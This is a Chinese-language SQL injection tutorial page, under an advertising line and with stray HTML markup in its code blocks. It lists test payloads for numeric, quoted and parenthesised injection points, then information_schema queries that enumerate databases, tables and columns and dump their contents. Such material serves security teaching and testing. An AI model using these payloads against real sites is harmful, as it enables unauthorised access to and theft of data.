💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、豆包、星火、月之暗面及文生图、文生视频 广告
# 步骤 ## **测试注入点是否存在** **1、id = 1 异常** ``` <pre class="calibre10">``` id <span class="token1">=</span> <span class="token6">1</span> and <span class="token6">1</span> <span class="token1">=</span><span class="token6">1</span> <span class="token1">--</span> <span class="token1">+</span> 正确 id <span class="token1">=</span> <span class="token6">1</span> and <span class="token6">1</span><span class="token1">=</span><span class="token6">2</span> <span class="token1">--</span> <span class="token1">+</span> 错误 ``` ``` 结论:极有可能存在数字型SQL注入 ps:单引号有个特殊的作用:命令分隔符 **2、id = 1' 异常** ``` <pre class="calibre10">``` id <span class="token1">=</span> <span class="token6">1</span>' and <span class="token6">1</span> <span class="token1">=</span><span class="token6">1</span> <span class="token1">--</span> <span class="token1">+</span> 正确 id <span class="token1">=</span> <span class="token6">1</span>' and <span class="token6">1</span><span class="token1">=</span><span class="token6">2</span> <span class="token1">--</span> <span class="token1">+</span> 错误 ``` ``` 结论:极有可能存在单引号字符型SQL注入 **3、id = 1" 异常** ``` <pre class="calibre10">``` id <span class="token1">=</span> <span class="token6">1</span>" and <span class="token6">1</span> <span class="token1">=</span><span class="token6">1</span> <span class="token1">--</span> <span class="token1">+</span> 正确 id <span class="token1">=</span> <span class="token6">1</span>" and <span class="token6">1</span><span class="token1">=</span><span class="token6">2</span> <span class="token1">--</span> <span class="token1">+</span> 错误 ``` ``` 结论:极有可能存在双引号字符型SQL注入 **4、id = 1) 异常** ``` <pre class="calibre10">``` id <span class="token1">=</span> <span class="token6">1</span><span class="token3">)</span> and <span class="token6">1</span> <span class="token1">=</span><span class="token6">1</span> <span class="token1">--</span> <span class="token1">+</span> 正确 id <span class="token1">=</span> <span class="token6">1</span><span class="token3">)</span> and <span class="token6">1</span><span class="token1">=</span><span class="token6">2</span> <span class="token1">--</span> <span class="token1">+</span> 错误 ``` ``` 结论:极有可能存在括号数字型SQL注入 ## **猜数据库** ``` <pre class="calibre10">``` select schema_name from information_schema<span class="token3">.</span>schemata ``` ``` ## **猜某库的数据表** ``` <pre class="calibre10">``` select table_name from information_schema<span class="token3">.</span>tables where table_schema<span class="token1">=</span>’xxxxx’ ``` ``` ## **猜某表的所有列** ``` <pre class="calibre10">``` Select column_name from information_schema<span class="token3">.</span>columns where table_name<span class="token1">=</span>’xxxxx’ ``` ``` ## **获取某列的内容** ``` <pre class="calibre17">``` Select <span class="token1">*</span><span class="token1">*</span><span class="token1">*</span> from <span class="token1">*</span><span class="token1">*</span><span class="token1">*</span><span class="token1">*</span> ``` ```